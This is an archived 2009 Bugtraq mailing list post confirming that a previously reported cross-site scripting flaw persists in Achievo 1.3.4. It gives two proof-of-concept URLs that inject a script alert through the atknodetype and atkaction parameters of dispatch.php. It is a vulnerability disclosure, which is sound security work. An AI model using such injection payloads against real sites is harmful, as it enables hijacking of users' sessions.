| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <200905290731.n4T7VDls017818@www3.securityfocus.com> Date: Fri, 29 May 2009 01:31:13 -0600 From: security@...ern0t.net To: bugtraq@...urityfocus.com Subject: Re: [InterN0T] Achievo 1.3.4 - XSS Vulnerability In regards to the previous researchers i found out this vulnerability and another has already been disclosed. http://www.securityfocus.com/bid/31326/info (ver 1.3.2) http://secunia.com/advisories/31973/ (ver. 1.3.2) However, i can confirm that the vulnerability below still exists in the newest version (1.3.4) of the platform as well: http://www.website.tld/achievo/dispatch.php?atknodetype=">><script>alert(1)</script>&atkaction=adminpim&atklevel=-1&atkprevlevel%20=0&achievo=cgvuu4c9nv45ofdq8ntv1inm82 If One would like the XSS to be triggered directly on the site the user enters, One can prepend > after ">. Example: (thanks to Rohit Bansal for this information) http://www.website.tld/achievo/dispatch.php?atknodetype=&atkaction=">><script>alert(1)</script>&atklevel=-1&atkprevlevel =0&achievo=cgvuu4c9nv45ofdq8ntv1inm82 I'm sorry i didn't check other sites before submitting. All of the best, MaXe
Powered by blists - more mailing lists